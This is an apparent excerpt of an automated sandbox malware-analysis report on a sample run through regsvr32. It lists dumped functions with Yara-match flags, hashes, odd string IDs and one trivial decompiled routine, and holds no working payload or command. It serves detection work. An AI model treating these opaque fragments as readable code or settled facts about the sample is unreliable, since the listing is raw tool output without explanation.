                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: + $S"
                                                                                            • API String ID: 0-2880694137
                                                                                            • Opcode ID: 0a120380ba46ade300821e018fa54fd0c93605979f7eaf18b3fcea56eb471111
                                                                                            • Instruction ID: 3997b0d77a3cbbce49aa6970110ff228252a62f11537e0b3de33ec13074dd8fd
                                                                                            • Opcode Fuzzy Hash: 0a120380ba46ade300821e018fa54fd0c93605979f7eaf18b3fcea56eb471111
                                                                                            • Instruction Fuzzy Hash: 5C51B5B090078ECFDF88DF64C88A5DE7BB0FB58354F10461DE866A6250D3B89665CF85
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074B130 Relevance: 2.6, Strings: 2, Instructions: 97COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: =K$d%
                                                                                            • API String ID: 0-2790768846
                                                                                            • Opcode ID: 046eeb3a7e312ef4597a0ceadb2c0b4017743bcb75cc6b1a2b492f4bea5b2233
                                                                                            • Instruction ID: 8586ef3cd3dff81e7df8af4218970a7a4508d2f9ab316a06a662e4b3d9afc5bc
                                                                                            • Opcode Fuzzy Hash: 046eeb3a7e312ef4597a0ceadb2c0b4017743bcb75cc6b1a2b492f4bea5b2233
                                                                                            • Instruction Fuzzy Hash: 5741E4B090074E8BDF48CF64C88A5DE7BF0FB58358F104A1DE86AA6250D3B89665CF85
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 007395BC Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: #|$`
                                                                                            • API String ID: 0-1687004633
                                                                                            • Opcode ID: 1dbd93d6a4af5ab501e4fd27d4ca136d79918f9d458c9bd4a0bbcc41cb67c6cc
                                                                                            • Instruction ID: c3e75afa0712d8ae90a2e539acd1e71a09905fb2a4a7a2646132e30fe0a2813c
                                                                                            • Opcode Fuzzy Hash: 1dbd93d6a4af5ab501e4fd27d4ca136d79918f9d458c9bd4a0bbcc41cb67c6cc
                                                                                            • Instruction Fuzzy Hash: DC41D6B190078E8FDF48CF68C88A4DE7BF0FB58358F014619F856A6250D3B89665CF85
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074C44C Relevance: 2.6, Strings: 2, Instructions: 87COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: c$j~;
                                                                                            • API String ID: 0-3832213246
                                                                                            • Opcode ID: 18b6bb2236c3d81442985b19945feacbaaab319f380d4d3d69fe49ad0df2425e
                                                                                            • Instruction ID: 25ce31f5d98f68ca11bbea036d20606e4569f88ca1f7aa9c39b14acd2f253860
                                                                                            • Opcode Fuzzy Hash: 18b6bb2236c3d81442985b19945feacbaaab319f380d4d3d69fe49ad0df2425e
                                                                                            • Instruction Fuzzy Hash: 2141A5B080078E8FDB88DF64C88A1DF7BB0FB54358F104A19EC6696250D3B89661CFD5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00737C08 Relevance: 2.6, Strings: 2, Instructions: 82COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: -h$W
                                                                                            • API String ID: 0-4146498651
                                                                                            • Opcode ID: ac1beb8efc805ec182d5897ee57bff0eb204918572bad0795e6a59dbf0da3e57
                                                                                            • Instruction ID: 9c874dd5da8a40f368f212b03d844fc60c651015905fe71f71fc8e3a665a1f6e
                                                                                            • Opcode Fuzzy Hash: ac1beb8efc805ec182d5897ee57bff0eb204918572bad0795e6a59dbf0da3e57
                                                                                            • Instruction Fuzzy Hash: 8041A4B590038EDFDB44CF68D88A5CE7BF0FB48358F114619F869A6250D3B49664CF85
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00758A00 Relevance: 2.6, Strings: 2, Instructions: 81COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .$fp
                                                                                            • API String ID: 0-3298127435
                                                                                            • Opcode ID: ddbbea76e87b75a0423c6c5dce58b2b1cb486f12ce18d3dc43adec7097cd1835
                                                                                            • Instruction ID: 07b2940b05991023366ec3f3d37c25f508377fafc4968f84e53af630630fac74
                                                                                            • Opcode Fuzzy Hash: ddbbea76e87b75a0423c6c5dce58b2b1cb486f12ce18d3dc43adec7097cd1835
                                                                                            • Instruction Fuzzy Hash: 7141F4B190470E8BDB88CF64C48A4DE7FB0FB28398F104619E856A6290D3B89665CFC4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00738FB0 Relevance: 2.6, Strings: 2, Instructions: 79COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: "$Zs
                                                                                            • API String ID: 0-3922668666
                                                                                            • Opcode ID: 68d2441b249f9a93f4c72500e977988d29b83f362e05d91f8df6eb9a31c852ba
                                                                                            • Instruction ID: f1d62621bd08a38fa15a490595be93b85bae5397fb0987493b8f1264ce03d9fe
                                                                                            • Opcode Fuzzy Hash: 68d2441b249f9a93f4c72500e977988d29b83f362e05d91f8df6eb9a31c852ba
                                                                                            • Instruction Fuzzy Hash: 803192B0529380ABC388DF28D19A91EBBE1FBD5708F806A1DF8C286390D374D406CB43
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00737840 Relevance: 2.6, Strings: 2, Instructions: 78COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: XW$s [
                                                                                            • API String ID: 0-2366283936
                                                                                            • Opcode ID: 76c1b907ae6b42603d5a16b60f951f87ab574e6943cc66960cdc964ad17b59d9
                                                                                            • Instruction ID: c8620a86b0501fca327921337904d07bbca0ac58b79dbc40019122cd377fd21c
                                                                                            • Opcode Fuzzy Hash: 76c1b907ae6b42603d5a16b60f951f87ab574e6943cc66960cdc964ad17b59d9
                                                                                            • Instruction Fuzzy Hash: 623190B190478E8FDF48DF28D88949A3BE1FB48304B004A1DFC6AD7250D7B4D665CB95
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00734C84 Relevance: 2.6, Strings: 2, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4V$jn(
                                                                                            • API String ID: 0-2529302498
                                                                                            • Opcode ID: 4347d8350eb776fef7c9ebb529210ab3cab55532b2ec0dd05afe6f01a2bbb923
                                                                                            • Instruction ID: cb5d544f3b4b9f04c9dfd671481ec3bad593690e5eb4dddf862df6e3aa1dae86
                                                                                            • Opcode Fuzzy Hash: 4347d8350eb776fef7c9ebb529210ab3cab55532b2ec0dd05afe6f01a2bbb923
                                                                                            • Instruction Fuzzy Hash: 17317EB1529381AFC398CF28C48A91ABBE0FBC9318F806A1DF8C686260D774D555CB02
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0073F65C Relevance: 2.6, Strings: 2, Instructions: 69COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: '$%6
                                                                                            • API String ID: 0-1852427169
                                                                                            • Opcode ID: 42a3203eb3ebe9af52f3f94821d08fbcbfa30131473cda762de5c23950ca3f94
                                                                                            • Instruction ID: 05249663a0179330ad45d21934dcfd5c9628912d79576b4f5c22a08ed84997fc
                                                                                            • Opcode Fuzzy Hash: 42a3203eb3ebe9af52f3f94821d08fbcbfa30131473cda762de5c23950ca3f94
                                                                                            • Instruction Fuzzy Hash: CD316FB5568381ABD388DF28C48A81ABBF1FB89308F806A1DF8C6DB251D775D545CB43
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00738A8C Relevance: 2.6, Strings: 2, Instructions: 68COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: uS$J
                                                                                            • API String ID: 0-437994327
                                                                                            • Opcode ID: a2b51c32bad19ba39d4e427c2f512c2a59b50882f014cb68f936c9e880adca61
                                                                                            • Instruction ID: 932e051fa095f2452f9631590778fc2aece6e7424a24d942ca29929a088bb8e0
                                                                                            • Opcode Fuzzy Hash: a2b51c32bad19ba39d4e427c2f512c2a59b50882f014cb68f936c9e880adca61
                                                                                            • Instruction Fuzzy Hash: D131C6B190034E8FDB84CF64C88A5DE7FB0FB28358F104619E859A6260D3B89695CFD5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00740A70 Relevance: 2.6, Strings: 2, Instructions: 62COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: +@$`.P
                                                                                            • API String ID: 0-1189405855
                                                                                            • Opcode ID: a70f442d9e9e175520b0b0d93d41500bfede9fc32031e6ea222cabd22b859c02
                                                                                            • Instruction ID: 39de2ea6a026fc69778914cf9e44a5f31bb4615b8119a4e03ad8497b2faa6ad6
                                                                                            • Opcode Fuzzy Hash: a70f442d9e9e175520b0b0d93d41500bfede9fc32031e6ea222cabd22b859c02
                                                                                            • Instruction Fuzzy Hash: A1316FB15187848FD348DF28C45941BBBE1BB9C758F804B1DF4CAAA260D778D645CF4A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00733CF4 Relevance: 2.6, Strings: 2, Instructions: 57COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ^$R
                                                                                            • API String ID: 0-3595634639
                                                                                            • Opcode ID: b7e08d49ea1b5b1d89cab638ecb6b58cb02da954cd334f399a60917b828591f9
                                                                                            • Instruction ID: 7dec6e6ff202478201587024085261afee01554c9ae7569198c8fcb843946a7e
                                                                                            • Opcode Fuzzy Hash: b7e08d49ea1b5b1d89cab638ecb6b58cb02da954cd334f399a60917b828591f9
                                                                                            • Instruction Fuzzy Hash: 112180B0528781AFC398DF28D49591FBBF1BB88744F806A1DF8C686390D779D505CB46
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00732FD4 Relevance: 2.6, Strings: 2, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: t^$w
                                                                                            • API String ID: 0-1486493484
                                                                                            • Opcode ID: d9d2b37262035f156a08dae9f88ea85b7583d03cc1c0d0918aa86d9476248fb5
                                                                                            • Instruction ID: 0fcab25796e593e8dfb7fafe86ea51ff53beb953310655f2f877b1f2b437242d
                                                                                            • Opcode Fuzzy Hash: d9d2b37262035f156a08dae9f88ea85b7583d03cc1c0d0918aa86d9476248fb5
                                                                                            • Instruction Fuzzy Hash: B1219DB090078E8FDB48DF68D8491DE7BB0FB18308F014A59F82996290D3B89665CF85
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00741924 Relevance: 1.7, Strings: 1, Instructions: 428COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: #
                                                                                            • API String ID: 0-606707520
                                                                                            • Opcode ID: 99547394c1cfeee33f3fbc263d3122085f4524b50faca7c5dbf1af4b9be79401
                                                                                            • Instruction ID: 4dd1cb3b4079214fceea326a174ac78aac63e1fa506fb9bcebaf2a82943caac1
                                                                                            • Opcode Fuzzy Hash: 99547394c1cfeee33f3fbc263d3122085f4524b50faca7c5dbf1af4b9be79401
                                                                                            • Instruction Fuzzy Hash: F9223870D14709EFDB58DFA8C49A49EBBF1FF44348F40816DE80AAB290D7749A19CB85
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0000000180008D28 Relevance: 1.6, APIs: 1, Instructions: 149COMMONCrypto
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00000001180008D28(long long __rbx, void* __rcx, void* __rdx, long long __rsi, signed int __r8, void* __r9) {
				signed long long _t25;
				void* _t27;
				void* _t30;

				 *((long long*)(_t30 + 8)) = __rbx;
				 *(_t30 + 0x10) = _t25;
				 *((long long*)(_t30 + 0x18)) = __rsi;
				_t27 = (_t25 | 0xffffffff) + 1;
				if ( *((intOrPtr*)(__rcx + _t27)) != dil) goto 0x80008d56;
				if (_t27 + __rdx -  !__r8 <= 0) goto 0x80008d92;
				return __rdx + 0xb;
			}






                                                                                            0x180008d28
                                                                                            0x180008d2d
                                                                                            0x180008d32
                                                                                            0x180008d56
                                                                                            0x180008d5d
                                                                                            0x180008d70
                                                                                            0x180008d91

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 878434512f6fc5ff46b6b37eb46f76afa4d2760e0137b3ef8e522d02086c18e5
                                                                                            • Instruction ID: 1f7af7de608e037a3e69fafdab2b7a4d19b0596ea53e23cf5e8b59c7fdfa90c1
                                                                                            • Opcode Fuzzy Hash: 878434512f6fc5ff46b6b37eb46f76afa4d2760e0137b3ef8e522d02086c18e5
                                                                                            • Instruction Fuzzy Hash: D151C432700B9489FBA1DB72A8447DE7BA1B7587D4F148225FE9827B99DF38C605D700
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00741030 Relevance: 1.6, Strings: 1, Instructions: 357COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ef
                                                                                            • API String ID: 0-3522424648
                                                                                            • Opcode ID: 63cf04038136136116a979567ba4b26417661d5f843165bc7989bb71bb8234a9
                                                                                            • Instruction ID: e1ff52c46848180c9227c1d0c8807d2911c976523379978882354da15622395d
                                                                                            • Opcode Fuzzy Hash: 63cf04038136136116a979567ba4b26417661d5f843165bc7989bb71bb8234a9
                                                                                            • Instruction Fuzzy Hash: E00218B0A04709EFDB58DF68C08959EBBF2FB44304F40816DE84AAB360D775DA59CB85
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0073EF14 Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: x]!-
                                                                                            • API String ID: 0-585868058
                                                                                            • Opcode ID: cf2a29744dbdbd02a151a4b044d1109f6beb7998a165a5b3606498e8daacfd79
                                                                                            • Instruction ID: 5b4d536fe385f5c0b14889ed56efff0f3569bab156a5faf58a890053aa4a1cc9
                                                                                            • Opcode Fuzzy Hash: cf2a29744dbdbd02a151a4b044d1109f6beb7998a165a5b3606498e8daacfd79
                                                                                            • Instruction Fuzzy Hash: 79D189B1A0060DCFDBA8CF78C54A5DD7BF1BB48308F606129E826AA2B6D7749905CF54
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074A8B0 Relevance: 1.4, Strings: 1, Instructions: 195COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: }^O
                                                                                            • API String ID: 0-3039680174
                                                                                            • Opcode ID: 2737519d22680c9269c125336f90b0d45ca51200b7d26ea2addf6a8d31d5b6e5
                                                                                            • Instruction ID: 67c0f23fd29af9def71624402dbd1979e55da75dccd8172f5820373a17c577f1
                                                                                            • Opcode Fuzzy Hash: 2737519d22680c9269c125336f90b0d45ca51200b7d26ea2addf6a8d31d5b6e5
                                                                                            • Instruction Fuzzy Hash: 27A17BB2502749CFDB98DF28C69A59D3BE1FF55308F004129FC1E9A2A0D3B4E925CB49
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00744D20 Relevance: 1.4, Strings: 1, Instructions: 142COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: RH
                                                                                            • API String ID: 0-2975065227
                                                                                            • Opcode ID: da44171f9c80a2056ccb259cc2b9eac6e02ade2ac8d9ef905a94791c40a4a894
                                                                                            • Instruction ID: 5d7c4141c7ba739edcc02c79d247265394a425e43ae5a28859ffa4e70af1ed33
                                                                                            • Opcode Fuzzy Hash: da44171f9c80a2056ccb259cc2b9eac6e02ade2ac8d9ef905a94791c40a4a894
                                                                                            • Instruction Fuzzy Hash: 0451187111C7448FC7A8DF18D4C66AAB7E0FB94310FA0991DE8CEC7251DF74A88A9B46
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0073BE90 Relevance: 1.4, Strings: 1, Instructions: 132COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Y
                                                                                            • API String ID: 0-579211002
                                                                                            • Opcode ID: c7ef7c05ef0c3c9f2aed6826f015ad160cfcc6abce9b29eb71b79f5d508516d5
                                                                                            • Instruction ID: 767c8bafb3f122f815eb64fbcb5c37a281c3f627f3bbe5dd6bd576d2f76ce603
                                                                                            • Opcode Fuzzy Hash: c7ef7c05ef0c3c9f2aed6826f015ad160cfcc6abce9b29eb71b79f5d508516d5
                                                                                            • Instruction Fuzzy Hash: 4551F5715107898BDB59DF28C88A0DD3BA1FB4835CF425318FD8EA62A1D77CD845CB49
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0073D6CC Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: vOs
                                                                                            • API String ID: 0-1852020951
                                                                                            • Opcode ID: 0a3c35978ef4d06ef910e88490b5bce2e9beff051be12035b9eadbcefa2f22bf
                                                                                            • Instruction ID: 62463a4996b39f7b395a9544c20fe865bde2d56aed95b0373e175d94b2f0c39d
                                                                                            • Opcode Fuzzy Hash: 0a3c35978ef4d06ef910e88490b5bce2e9beff051be12035b9eadbcefa2f22bf
                                                                                            • Instruction Fuzzy Hash: 20618DB190030ECFDB49CF68D48A5CE7FB0FB64398F204519E845A6260D7B996A8CFD5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0073461C Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: *)
                                                                                            • API String ID: 0-1811957435
                                                                                            • Opcode ID: c39f41b8af2b9280dd7c00c4ba0ddd05394017a856c7f82ca50d576e38ac2643
                                                                                            • Instruction ID: ca14b646306a201cbebf8859462843f9ceaed425e9293687db7a7dfae74d02d9
                                                                                            • Opcode Fuzzy Hash: c39f41b8af2b9280dd7c00c4ba0ddd05394017a856c7f82ca50d576e38ac2643
                                                                                            • Instruction Fuzzy Hash: 8D31933061CB888FC72CDF29D08556AB7E0FB99301F504A2EE58AC7365DB74D805CB82
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0073F77C Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: t
                                                                                            • API String ID: 0-1935021737
                                                                                            • Opcode ID: 783391770682b9c9d34a01018b97ccb4612aed757a5715f7015a6466eeb6abdd
                                                                                            • Instruction ID: 0e3b87161036056717c35a601d53e9d543cbe45ac87f3e7cd29bb7bbf1fa8cf4
                                                                                            • Opcode Fuzzy Hash: 783391770682b9c9d34a01018b97ccb4612aed757a5715f7015a6466eeb6abdd
                                                                                            • Instruction Fuzzy Hash: 27319F3061DB848FE768DF2CD48916ABBE0FB96340F104A6DE5CAC7266D770D805CB82
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0075181C Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: __
                                                                                            • API String ID: 0-2267946753
                                                                                            • Opcode ID: 8f9b035c25ddab069e89f1d5b32d9e06551c62a3022c943f576078da68d92037
                                                                                            • Instruction ID: f828d04dc4844e21020736e096551d72127a7243d3577d4fee6bd43bdef74359
                                                                                            • Opcode Fuzzy Hash: 8f9b035c25ddab069e89f1d5b32d9e06551c62a3022c943f576078da68d92037
                                                                                            • Instruction Fuzzy Hash: 9141E070508B848BE758DF29C18A41ABBF1FBC9304F500A2DF69A87361C775D845CB42
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00739408 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: GSn
                                                                                            • API String ID: 0-1733515909
                                                                                            • Opcode ID: 120b4183c770ef369911dc760361451600c2e99f203226371e5481c8821bf4d7
